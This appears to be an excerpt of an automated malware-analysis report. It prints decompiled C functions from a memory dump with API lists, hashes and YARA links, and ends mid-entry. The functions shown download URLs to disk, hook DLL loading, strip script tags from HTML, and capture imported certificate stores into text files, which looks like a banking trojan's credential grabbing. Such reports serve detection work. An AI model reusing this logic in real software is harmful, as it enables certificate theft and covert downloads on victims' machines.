        • Opcode ID: 90cdceff1649920835eff07b8bd6c180e534640d36e19a541435160d49f8a250
        • Instruction ID: b4c5599ea9592e94c7957354aa2bda35cd547b8e2b770a2c72b359a2dbc5f4e0
        • Opcode Fuzzy Hash: 90cdceff1649920835eff07b8bd6c180e534640d36e19a541435160d49f8a250
        • Instruction Fuzzy Hash: 7E21E131940228AADF20FBA5CD0AADE7B68EF54340F11417BF906F61D1D7B88E55CB88
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040741B, Relevance: 10.6, APIs: 7, Instructions: 144networkCOMMON
        Download Yara Rule
        C-Code - Quality: 70%
        			E0040741B(void* _a4, long* _a8) {
				char _v5;
				signed int _v12;
				char _v16;
				char* _v20;
				char _v24;
				char* _v28;
				char _v48;
				char _v1564;
				char _v1568;
				void* __ebx;
				void* __esi;
				signed int _t56;
				intOrPtr _t63;
				int _t65;
				intOrPtr _t66;
				char* _t69;
				long _t70;
				intOrPtr _t71;
				signed int _t79;
				long* _t81;
				signed int _t82;
				char* _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				void* _t95;

				_t79 = 0;
				_t91 =  *0x414cc4(2, 2, 0);
				if(_t91 != 0xffffffff) {
					_v12 = 0;
					 *0x414cf4(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
					 *0x414cb0(_t91);
					_t82 = 0x4c;
					_t56 = _v12 / _t82;
					_t92 = 0;
					_v5 = 1;
					_v16 = 0;
					_v20 = 0;
					_v12 = _t56;
					if(_t56 <= 0) {
						L23:
						return _t56 & 0xffffff00 | _v12 != _t79;
					}
					_t89 =  &_v1564;
					do {
						if(( *(_t89 - 4) & 0x00000001) == 0) {
							goto L17;
						}
						_t56 = E004070F0(_t89);
						if(_t56 != 0) {
							goto L17;
						}
						if(_v5 != _t79) {
							_t66 =  *0x414b7c; // 0x418000
							_t18 = _t66 + 0x24; // 0x1a001e
							_t84 =  *_t18 & 0x000000ff;
							_t19 = _t66 + 0x26; // 0x200001a
							_t21 = _t66 + 0x12c; // 0x1a014a
							_t56 = E0040ABE5( &_v24,  *_t19 & 0x000000ff, _t92, ( *_t18 & 0x000000ff) + _t21);
							_t92 = _t56;
							if(_t92 != 0) {
								_t69 = E0040F346(_t56, _v24);
								_t92 = 0;
								_v28 = _t69;
								if(_t69 != 0) {
									_t70 = GetTickCount();
									_t81 = _a8;
									 *_t81 = _t70;
									_t71 =  *0x414b7c; // 0x418000
									_t26 = _t71 + 0x28; // 0xe36d0200
									_t93 =  *_t26 & 0x0000ffff;
									if(InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0) != 0) {
										_t92 = E004070A8(_t84,  &_v16, _t93, _t73);
									} else {
										_t92 = 0;
									}
									 *_t81 = GetTickCount() -  *_t81;
									E0040F15E(_v28);
								}
								_t56 = E0040F15E(_v24);
							}
							_v5 = 0;
							_t79 = 0;
						}
						if(_t92 == _t79) {
							L22:
							goto L23;
						} else {
							_t63 =  *0x414ad4; // 0x241f5a8
							_t65 = wnsprintfA( &_v48, 0x14,  *(_t63 + 0x6c),  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
							_t95 = _t95 + 0x1c;
							_t56 = E0040A3D4( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
							if(_t56 != 0) {
								_v12 = _t79;
								L20:
								if(_t92 != _t79) {
									_t56 = E0040F15E(_v16);
								}
								goto L22;
							}
						}
						L17:
						_v20 =  &(_v20[1]);
						_t56 = _v20;
						_t89 = _t89 + 0x4c;
					} while (_t56 < _v12);
					goto L20;
				}
				return 0;
			}





























        0x00407426
        0x00407433
        0x00407438
        0x0040745b
        0x0040745e
        0x00407465
        0x00407472
        0x00407473
        0x00407475
        0x00407477
        0x0040747b
        0x0040747e
        0x00407481
        0x00407486
        0x004075af
        0x00000000
        0x004075b2
        0x0040748d
        0x00407493
        0x00407497
        0x00000000
        0x00000000
        0x0040749f
        0x004074a6
        0x00000000
        0x00000000
        0x004074af
        0x004074b5
        0x004074ba
        0x004074ba
        0x004074be
        0x004074c2
        0x004074cd
        0x004074d2
        0x004074d6
        0x004074db
        0x004074e0
        0x004074e2
        0x004074e7
        0x004074e9
        0x004074ef
        0x004074f2
        0x004074f4
        0x004074f9
        0x004074f9
        0x00407515
        0x00407525
        0x00407517
        0x00407517
        0x00407517
        0x00407532
        0x00407534
        0x00407534
        0x0040753c
        0x0040753c
        0x00407541
        0x00407545
        0x00407545
        0x00407549
        0x004075ae
        0x00000000
        0x0040754b
        0x0040755f
        0x0040756d
        0x00407573
        0x00407582
        0x00407589
        0x0040759f
        0x004075a2
        0x004075a4
        0x004075a9
        0x004075a9
        0x00000000
        0x004075a4
        0x00407589
        0x0040758b
        0x0040758b
        0x0040758e
        0x00407591
        0x00407594
        0x00000000
        0x0040759d
        0x00000000

        APIs
        • socket.WS2_32(00000002,00000002,00000000), ref: 0040742D
        • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 0040745E
        • closesocket.WS2_32(00000000), ref: 00407465
        • GetTickCount.KERNEL32 ref: 004074E9
        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 0040750D
        • GetTickCount.KERNEL32 ref: 00407527
        • wnsprintfA.SHLWAPI ref: 0040756D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
        • String ID:
        • API String ID: 1843894412-0
        • Opcode ID: 29079f2a94d991d832ef221f1bead2f3b38d6d1301c4b7bcf7facfe83ee15b0c
        • Instruction ID: b96203d3dbb770c7021f66e01e26e60930ede7da8ff16ff3c81a6b75085f5ef0
        • Opcode Fuzzy Hash: 29079f2a94d991d832ef221f1bead2f3b38d6d1301c4b7bcf7facfe83ee15b0c
        • Instruction Fuzzy Hash: E851B3B1C04119BFDB119FA4CC85AFEBBB8AF48304F058176F910B7291D638AE518BA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040CD37, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84networksynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E0040CD37(signed int __eax, void* __ebx, void* __edi) {
				void* __esi;
				signed char _t40;
				signed int _t41;
				void* _t45;
				void* _t62;
				void* _t63;
				signed int _t65;
				void* _t69;
				void* _t70;
				signed char* _t74;

				_t69 = __edi;
				_t62 = __ebx;
				_t74 = __eax * 0x30 +  *0x414f5c;
				if(( *_t74 & 0x00000001) != 0) {
					WaitForSingleObject(_t74[0x14], 0xffffffff);
					CloseHandle(_t74[0x14]);
				}
				_push(_t62);
				_t63 = 0;
				if(_t74[0x28] > 0) {
					_push(_t69);
					_t70 = 0;
					do {
						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
						_t63 = _t63 + 1;
						_t70 = _t70 + 0x18;
					} while (_t63 < _t74[0x28]);
				}
				E0040F15E(_t74[0x18]);
				E0040F15E(_t74[0x24]);
				if(( *_t74 & 0x00000002) != 0) {
					InternetCloseHandle(_t74[0x10]);
					InternetCloseHandle(_t74[0xc]);
					InternetCloseHandle(_t74[8]);
				}
				_t40 =  *_t74;
				if((_t40 & 0x0000000c) != 0) {
					if((_t40 & 0x00000008) != 0) {
						_t47 = _t74[0x2c];
						if(_t74[0x2c] != 0) {
							E0040F15E( *((intOrPtr*)(_t47 + 0x14)));
						}
					}
					E0040F15E(_t74[0x2c]);
				}
				_t41 =  *0x414f58; // 0x417365
				_t74[4] = _t74[4] & 0x00000000;
				if(_t41 <= 0) {
					L18:
					return _t41;
				} else {
					_t65 =  *0x414f5c; // 0x72430077
					_t36 = _t65 - 0x30; // 0x8c388038
					if(_t74 != _t41 * 0x30 + _t36) {
						goto L18;
					} else {
						if(_t41 != 1) {
							_t42 = _t41 - 1;
							 *0x414f58 = _t41 - 1;
							return E0040F0F6(_t42 * 0x30, 0x414f5c);
						}
						_t45 = E0040F15E(_t65);
						 *0x414f5c =  *0x414f5c & 0x00000000;
						 *0x414f58 =  *0x414f58 & 0x00000000;
						return _t45;
					}
				}
			}













        0x0040cd37
        0x0040cd37
        0x0040cd3d
        0x0040cd46
        0x0040cd4d
        0x0040cd56
        0x0040cd56
        0x0040cd5c
        0x0040cd5d
        0x0040cd62
        0x0040cd64
        0x0040cd65
        0x0040cd67
        0x0040cd6e
        0x0040cd7a
        0x0040cd86
        0x0040cd92
        0x0040cd97
        0x0040cd98
        0x0040cd9b
        0x0040cda0
        0x0040cda4
        0x0040cdac
        0x0040cdb5
        0x0040cdba
        0x0040cdc3
        0x0040cdcc
        0x0040cdcc
        0x0040cdd2
        0x0040cdd6
        0x0040cdda
        0x0040cddc
        0x0040cde1
        0x0040cde6
        0x0040cde6
        0x0040cde1
        0x0040cdee
        0x0040cdee
        0x0040cdf3
        0x0040cdf8
        0x0040cdfe
        0x0040ce42
        0x0040ce42
        0x0040ce00
        0x0040ce00
        0x0040ce0b
        0x0040ce11
        0x00000000
        0x0040ce13
        0x0040ce16
        0x0040ce2e
        0x0040ce2f
        0x00000000
        0x0040ce3c
        0x0040ce19
        0x0040ce1e
        0x0040ce25
        0x0040ce2d
        0x0040ce2d
        0x0040ce11

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
        • CloseHandle.KERNEL32(?), ref: 0040CD56
        • InternetCloseHandle.WININET(?), ref: 0040CDBA
        • InternetCloseHandle.WININET(?), ref: 0040CDC3
        • InternetCloseHandle.WININET(?), ref: 0040CDCC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$ObjectSingleWait
        • String ID: esA
        • API String ID: 2916869018-3029634026
        • Opcode ID: c4e11cc86cedcfdc221d876800aee5aad95e585736b9c8960f7070537dbd1c77
        • Instruction ID: 081e6302a4846881dbbaeb91573ff91519478b9ba6c7a32e075ab9846c7002c1
        • Opcode Fuzzy Hash: c4e11cc86cedcfdc221d876800aee5aad95e585736b9c8960f7070537dbd1c77
        • Instruction Fuzzy Hash: 21317E32500600DFCB316F25ED85A86BBE6AF48714B11863EE466AAAB1C735EC45CB4C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040FC6A, Relevance: 10.6, APIs: 7, Instructions: 78filememorysynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040FC6A(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				long _t32;
				void* _t37;
				void* _t39;

				_v5 = 0;
				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t39 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t37 = RtlAllocateHeap( *0x415fa8, 8, 0x1004);
				if(_t37 == 0) {
					L13:
					CloseHandle(_t39);
					if(_v5 == 0) {
						E00410093(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t39);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
						break;
					}
					_t32 = _v12;
					if(_t32 != _v20) {
						break;
					}
					_v16 = _v16 + _t32;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E0040F15E(_t37);
				goto L13;
			}










        0x0040fc87
        0x0040fc90
        0x0040fc95
        0x0040fd39
        0x0040fd3f
        0x0040fd3f
        0x0040fcaf
        0x0040fcb3
        0x0040fd24
        0x0040fd25
        0x0040fd2f
        0x0040fd34
        0x0040fd34
        0x00000000
        0x0040fd2f
        0x0040fcb5
        0x0040fcb8
        0x0040fce3
        0x00000000
        0x00000000
        0x0040fce8
        0x0040fd14
        0x0040fd1a
        0x00000000
        0x0040fd1a
        0x0040fcfc
        0x00000000
        0x00000000
        0x0040fcfe
        0x0040fd04
        0x00000000
        0x00000000
        0x0040fd06
        0x0040fd0f
        0x00000000
        0x00000000
        0x00000000
        0x0040fd11
        0x0040fd1f
        0x00000000

        APIs
        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040FC8A
        • RtlAllocateHeap.NTDLL(00000008,00001004,?), ref: 0040FCA9
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FCC1
        • InternetReadFile.WININET(?,00000000,00001000,?), ref: 0040FCDB
        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040FCF4
        • FlushFileBuffers.KERNEL32(00000000), ref: 0040FD14
        • CloseHandle.KERNEL32(00000000), ref: 0040FD25
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AllocateBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
        • String ID:
        • API String ID: 4284787851-0
        • Opcode ID: debfd7d940a02b89b86b1e4fac9470ed56e219114ba077c5aba2bbaa2e25e5ff
        • Instruction ID: d4c67cc0f7f5969401ba13ab9157cb9938766dbaa36007d5ba6a7a17ffcc68bb
        • Opcode Fuzzy Hash: debfd7d940a02b89b86b1e4fac9470ed56e219114ba077c5aba2bbaa2e25e5ff
        • Instruction Fuzzy Hash: D4218135900248BBDB219FA0EC85FEE7B79BF85310F108076F952B25D0C7795D498B69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407889, Relevance: 10.6, APIs: 7, Instructions: 77stringCOMMON
        Download Yara Rule
        C-Code - Quality: 77%
        			E00407889(void* __eax, void* __edi, intOrPtr _a4) {
				int _t10;
				void* _t11;
				intOrPtr _t12;
				intOrPtr* _t23;
				int _t24;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void _t31;

				_t28 = __edi;
				_t29 = __eax;
				if(__eax != 0) {
					L8:
					_t26 = 0;
					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
						L16:
						_t10 = IsBadHugeReadPtr(_t29, 0x14);
						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
							L19:
							_t11 = 0;
							goto L20;
						} else {
							_t11 = _t29;
							L20:
							return _t11;
						}
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t12 =  *((intOrPtr*)(_t29 + 0xc));
						if(_t12 == 0) {
							break;
						}
						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
							_push(_a4);
							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
							_t26 = 0;
							if( *0x414dc8() == 0) {
								goto L16;
							}
							L14:
							_t29 = _t29 + 0x14;
							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
								continue;
							}
							break;
						}
						_t26 = 1;
						goto L14;
					}
					if(_t26 != 0) {
						goto L19;
					}
					goto L16;
				}
				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
					L12:
					return 0;
				} else {
					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
					if( *_t23 != 0x4550) {
						goto L12;
					}
					_t30 = _t23 + 0x80;
					_t24 = IsBadHugeReadPtr(_t30, 8);
					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
						goto L12;
					} else {
						_t31 =  *_t30;
						if(_t31 == 0) {
							goto L12;
						}
						_t29 = __edi + _t31;
						goto L8;
					}
				}
			}













        0x00407889
        0x0040788a
        0x0040788e
        0x004078d4
        0x004078d8
        0x004078e2
        0x0040792c
        0x0040792f
        0x00407937
        0x00407942
        0x00407942
        0x00000000
        0x0040793e
        0x0040793e
        0x00407944
        0x00000000
        0x00407944
        0x00000000
        0x00000000
        0x00000000
        0x004078e4
        0x004078e4
        0x004078e4
        0x004078e9
        0x00000000
        0x00000000
        0x004078f8
        0x00407905
        0x0040790b
        0x0040790c
        0x00407916
        0x00000000
        0x00000000
        0x00407918
        0x0040791a
        0x00407926
        0x00000000
        0x00000000
        0x00000000
        0x00407926
        0x004078fa
        0x00000000
        0x004078fa
        0x0040792a
        0x00000000
        0x00000000
        0x00000000
        0x0040792a
        0x0040789b
        0x004078fe
        0x00000000
        0x004078a7
        0x004078aa
        0x004078b2
        0x00000000
        0x00000000
        0x004078b4
        0x004078bd
        0x004078c5
        0x00000000
        0x004078cc
        0x004078cc
        0x004078d0
        0x00000000
        0x00000000
        0x004078d2
        0x00000000
        0x004078d2
        0x004078c5

        APIs
        • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 00407893
        • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004078BD
        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004078DA
        • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004078F0
        • lstrcmpi.KERNEL32(?,?), ref: 0040790E
        • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 0040791E
        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 0040792F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead$lstrcmpi
        • String ID:
        • API String ID: 1912838836-0
        • Opcode ID: 9b24cd91fb82fb289a08ee6086995cb4097767caec4c0e0ffd22698606fe794d
        • Instruction ID: b87a17693d0ea2a1d5d9293cbabd089311c6cea6ae44029d70b1616ca69a569d
        • Opcode Fuzzy Hash: 9b24cd91fb82fb289a08ee6086995cb4097767caec4c0e0ffd22698606fe794d
        • Instruction Fuzzy Hash: 17216F72F497119BEB305B248C08BA73398BF51751B098076E945E62E0E778EC01D7AA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404729, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringtimeCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E00404729(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t36;
				intOrPtr _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;

				_t41 = __edx;
				_t39 = __ecx;
				_t48 = _t50 - 0x6c;
				_t37 =  *((intOrPtr*)(_t48 + 0x78));
				_t46 =  *((intOrPtr*)(_t48 + 0x74));
				_t19 =  *0x414c34(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
					GetSystemTime(_t48 + 0x5c);
					_t25 =  *0x414ad4; // 0x241f5a8
					wnsprintfW(_t48 - 0x6c, 0x63,  *(_t25 + 0x180), L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
					if(E0041341D(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
						L7:
						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
					} else {
						if(_t37 != 0) {
							lstrcatW(_t48 - 0x6c, L".txt");
							if(E0041341D(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040F649(_t37) + _t32) == 0) {
								goto L7;
							}
						}
					}
				}
				return  *((intOrPtr*)(_t48 + 0x7c));
			}














        0x00404729
        0x00404729
        0x0040472a
        0x00404735
        0x00404739
        0x00404742
        0x0040474a
        0x0040474f
        0x0040476e
        0x00404783
        0x00404799
        0x004047b5
        0x004047e5
        0x004047e5
        0x004047b7
        0x004047b9
        0x004047c4
        0x004047e3
        0x00000000
        0x00000000
        0x004047e3
        0x004047b9
        0x004047b5
        0x004047f2

        APIs
        • PFXImportCertStore.CRYPT32(?,?,?), ref: 00404742
        • GetSystemTime.KERNEL32(?), ref: 0040476E
        • wnsprintfW.SHLWAPI ref: 00404799
        • lstrcatW.KERNEL32(?,.txt), ref: 004047C4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CertImportStoreSystemTimelstrcatwnsprintf
        • String ID: .txt$grb
        • API String ID: 1380901484-2795990106
        • Opcode ID: c61322fbf3309272e70b01194ada5128c4cbad75fe4855e665480c5f55a78705
        • Instruction ID: 3be26e79084ef858318da3bc01e19091e52679322a649ec0e745cfee319fbd73
        • Opcode Fuzzy Hash: c61322fbf3309272e70b01194ada5128c4cbad75fe4855e665480c5f55a78705
        • Instruction Fuzzy Hash: E72183B1500608AADB31AFA5DC44DEAB7ECEB8D705F114537FA64E3191D3399A04CB25
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405C84, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72librarystringloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 46%
        			E00405C84(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				short _v524;
				void* __esi;
				long _t15;
				WCHAR* _t25;
				void* _t28;
				void* _t29;
				void* _t36;
				HMODULE* _t37;
				UNICODE_STRING* _t38;
				intOrPtr _t47;

				_t38 = _a12;
				if( *0x414d14 == 0 && _t38 != 0) {
					_t25 =  *(_t38 + 4);
					if(_t25 != 0) {
						lstrcpynW( &_v524, _t25, (( *_t38 & 0x0000ffff) >> 1) + 1);
					}
				}
				_t37 = _a16;
				_t29 =  *0x414c08(_a4, _a8, _t38, _t37, _t28);
				_t15 = LdrLoadDll(_a4, _a8, _t38, _t37);
				_a8 = _t15;
				if(_t15 == 0 && _t29 != 0 &&  *( *_t37) == 0x5a4d) {
					 *0x414ed8(0x414784);
					E00407A50(0x4144e0, 0x5a4d, _t36,  *_t37);
					 *0x414edc(0x414784);
				}
				_t47 =  *0x414d14; // 0x1d50065
				if(_t47 == 0 && _a8 == 0 && _t38 != 0 && _t37 != 0 &&  *(_t38 + 4) != 0) {
					E0040BEAD( *_t37,  &_v524);
				}
				return _a8;
			}













        0x00405c95
        0x00405c99
        0x00405c9f
        0x00405ca4
        0x00405cb5
        0x00405cb5
        0x00405ca4
        0x00405cbb
        0x00405cd2
        0x00405cd7
        0x00405cdd
        0x00405ce2
        0x00405cfa
        0x00405d07
        0x00405d0d
        0x00405d0d
        0x00405d16
        0x00405d1c
        0x00405d39
        0x00405d39
        0x00405d44

        APIs
        • lstrcpynW.KERNEL32(?,?), ref: 00405CB5
        • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 00405CC7
        • LdrLoadDll.NTDLL(?,?,?,?), ref: 00405CD7
        • RtlEnterCriticalSection.NTDLL(FrameRect), ref: 00405CFA
        • RtlLeaveCriticalSection.NTDLL(FrameRect), ref: 00405D0D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHandleLeaveLoadlstrcpyn
        • String ID: FrameRect
        • API String ID: 2966231580-1529682053
        • Opcode ID: 2305a90f837fce8756c83d8e436a2c5f9c8b2ea83bc4c7f88c3a63c7484ec3f3
        • Instruction ID: 4d8fdf2636f4e89a694751e06147236880839881aab1442c9ed42e6236f561cf
        • Opcode Fuzzy Hash: 2305a90f837fce8756c83d8e436a2c5f9c8b2ea83bc4c7f88c3a63c7484ec3f3
        • Instruction Fuzzy Hash: 22218876501615ABDF209F60DC489AB77A8EF84344B00C43BF952A72A0EB78DD50CFA8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405456, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 145COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00405456(intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t52;
				intOrPtr _t57;
				signed int _t58;
				void* _t61;
				void* _t66;
				void* _t69;
				char _t71;
				int _t72;
				void* _t76;
				void* _t77;
				intOrPtr _t80;
				char* _t82;
				intOrPtr _t84;
				void* _t86;

				_t71 = 0;
				_t84 = _a8;
				_v16 = 0;
				_v6 = 0;
				_v20 = 0;
				_v12 = 0;
				if(_t84 <= 0) {
					L43:
					return _v12 - _t71 + _t84;
				} else {
					do {
						_t80 = _a4;
						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
							_t52 =  *((intOrPtr*)(_t71 + _t80));
							if(_t52 != 0x3c) {
								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
									goto L41;
								} else {
									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
										L39:
										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
										goto L40;
									} else {
										_t38 = _t80 + 1; // 0x1
										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
											goto L39;
										}
										 *((char*)(_v12 + _t80)) = 0x20;
										_t71 = _t71 + 5;
										L40:
										_v12 = _v12 + 1;
										goto L41;
									}
								}
							}
							_t57 = _v16;
							_v16 = _v16 + 1;
							if(_t57 != 0) {
								goto L41;
							}
							_t86 = _t84 - _t71;
							_t16 = _t80 + 1; // 0x1
							_t82 = _t71 + _t16;
							if(_v6 == _t57) {
								if(_t86 <= 6) {
									L21:
									_v5 = 0;
									do {
										_t58 = _v5 & 0x000000ff;
										_t22 = _t58 + 0x401b04; // 0x2020202
										_t72 =  *_t22 & 0x000000ff;
										if(_t86 <= _t72) {
											goto L27;
										}
										if(StrCmpNIA(_t82,  *(0x401af4 + _t58 * 4), _t72) != 0) {
											_t61 = 0;
										} else {
											_t61 = E00405435(_t82, _t72);
										}
										if(_t61 != 0) {
											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
											_t71 = _v20;
											 *((char*)(_v12 + _a4)) =  *_t30;
											goto L40;
										}
										L27:
										_v5 = _v5 + 1;
									} while (_v5 < 4);
									_t71 = _v20;
									goto L41;
								}
								if(StrCmpNIA(_t82, "script", 6) != 0) {
									_t66 = 0;
								} else {
									_t76 = 6;
									_t66 = E00405435(_t82, _t76);
								}
								if(_t66 == 0) {
									goto L21;
								} else {
									_v6 = 1;
									goto L41;
								}
							}
							if(_t86 > 7 &&  *_t82 == 0x2f) {
								_t83 =  &(_t82[1]);
								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
									_t69 = 0;
								} else {
									_t77 = 6;
									_t69 = E00405435(_t83, _t77);
								}
								if(_t69 != 0) {
									_v6 = 0;
								}
							}
						} else {
							_v16 = _v16 - 1;
						}
						L41:
						_t84 = _a8;
						_t71 = _t71 + 1;
						_v20 = _t71;
					} while (_t71 < _t84);
					goto L43;
				}
			}






















        0x0040545d
        0x00405460
        0x00405463
        0x00405466
        0x00405469
        0x0040546c
        0x00405471
        0x004055e8
        0x004055f2
        0x00405477
        0x00405478
        0x0040547c
        0x0040547f
        0x0040548f
        0x00405494
        0x0040558b
        0x00000000
        0x0040559f
        0x004055a1
        0x004055cc
        0x004055d2
        0x00000000
        0x004055aa
        0x004055b1
        0x004055be
        0x00000000
        0x00000000
        0x004055c3
        0x004055c7
        0x004055d5
        0x004055d5
        0x00000000
        0x004055d5
        0x004055a1
        0x0040558b
        0x0040549a
        0x0040549d
        0x004054a2
        0x00000000
        0x00000000
        0x004054a8
        0x004054aa
        0x004054aa
        0x004054b1
        0x004054fa
        0x00405529
        0x00405529
        0x0040552d
        0x0040552d
        0x00405531
        0x00405531
        0x0040553a
        0x00000000
        0x00000000
        0x0040554e
        0x0040555b
        0x00405550
        0x00405554
        0x00405554
        0x0040555f
        0x00405573
        0x0040557f
        0x00405582
        0x00000000
        0x00405582
        0x00405561
        0x00405561
        0x00405564
        0x0040556a
        0x00000000
        0x0040556a
        0x0040550c
        0x0040551a
        0x0040550e
        0x00405512
        0x00405513
        0x00405513
        0x0040551e
        0x00000000
        0x00405520
        0x00405520
        0x00000000
        0x00405520
        0x0040551e
        0x004054b6
        0x004054cc
        0x004054d6
        0x004054e4
        0x004054d8
        0x004054dc
        0x004054dd
        0x004054dd
        0x004054e8
        0x004054ee
        0x004054ee
        0x004054e8
        0x00405487
        0x00405487
        0x00405487
        0x004055d8
        0x004055d8
        0x004055db
        0x004055dc
        0x004055df
        0x00000000
        0x004055e7

        APIs
        • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 004054CE
        • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 00405504
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID: nbsp;$script
        • API String ID: 0-298180595
        • Opcode ID: dc6878109b0c659419326159b9f265711e2c7b00f93621642e501e224fbf65ee
        • Instruction ID: d7747634e3afbc1a5463df14372a343ee96f08d2062dcb6b4a4deb43454e8e66
        • Opcode Fuzzy Hash: dc6878109b0c659419326159b9f265711e2c7b00f93621642e501e224fbf65ee
